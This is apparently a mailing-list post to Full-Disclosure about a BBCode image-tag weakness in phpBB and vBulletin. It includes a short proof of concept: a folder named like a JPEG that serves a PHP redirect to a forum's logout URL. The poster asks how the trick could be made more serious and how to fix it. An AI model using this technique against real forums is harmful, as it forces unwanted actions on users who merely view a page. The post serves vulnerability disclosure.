BBCode [IMG] [/IMG ] Tag Vulnerability

[h4cky0u <h4cky0u.org () gmail com>]

Hi,

Saw this one on www.waraxe.us (Discovered by Easyex) and i was
thinking if there are some more possibilities using the method
described. The POC below is for phpBB. -

==========
make yourself a folder on your host 
rename the folder to signature.jpg 
this will trick bbcode that its an image file. 

example http://sitewithmaliciouscode/signature.jpg 

inside that folder .. put this code .. 
and rename it to index.php file. 

Quote: 
<?php 
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true";); 
exit; 
?>

this will make every visitor getting logout when they view the thread that 
have image linked to this.
===================


This seems to be working on almost all the scripts using BBcode.
Successfully tested on vBulletin 3.0.7 and phpBB 2.0.17 when used the
image link to the folder with the malicious code as the forum
signature. What i was wondering is there anything more serious than
logging out the users that can be done with this? The admin folders of
ipb and phpbb need reauthentication. So nothing serious for them but
anything more innovative that could be done? And any way to fix this?

Regards,
-- 
http://www.h4cky0u.org
(In)Security at its best...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/